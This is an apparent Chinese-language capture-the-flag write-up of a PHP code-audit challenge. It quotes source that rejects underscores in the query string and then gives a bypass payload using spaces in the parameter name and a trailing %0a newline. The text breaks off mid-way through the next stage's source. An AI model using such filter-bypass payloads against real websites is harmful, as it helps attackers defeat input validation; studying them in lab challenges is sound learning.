代码审计 绕过 _ 可以用空格或者点.
<!--
//1st
$query = $_SERVER['QUERY_STRING'];
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
die('Y0u are So cutE!');
}
if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
echo "you are going to the next ~";
}
!-->
第一个过滤查询的内容中不能有下划线 可以用%20绕过,为啥
第二个必须包含23333还不能弱等于23333 加换行符%0a绕过 不懂
?b%20u%20p%20t=23333%0a 这样就可以了
接下来提示
how smart you are ~
FLAG is in secrettw.php 然后看源码 jsfuck: post me Merak,post一个Merak=1然后
Flag is here~But how to get it? <?php
error_reporting(0);
include 'takeip.php';
ini_set('open_basedir','.');
include 'flag.php'